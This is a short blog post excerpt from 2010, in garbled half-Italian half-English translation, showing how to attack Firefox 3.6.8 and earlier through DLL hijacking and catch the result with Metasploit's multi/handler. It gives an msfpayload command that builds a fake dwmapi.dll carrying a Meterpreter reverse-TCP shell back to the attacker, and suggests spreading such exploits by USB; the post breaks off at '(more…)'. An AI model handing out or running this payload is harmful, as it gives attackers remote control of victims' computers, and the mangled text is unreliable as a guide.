[Metasploit] multi/handler :D
Monday, August 30th, 2010Using this option Metasploit, we can keep listening to the Metasploit client does not connect to our server.
In a nutshell, se mandiamo exploit in giro (for example via USB) metasploit, listens to the user executes it…
Let's see how to attack firefox < = 3.6.8 con il DLL Hijacking e multi / handler in metasploit.
The dll that loads firefox execution, is:
dwmapi.dll
We create the false dll:
sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=IP D > dwmapi.dll(more…)







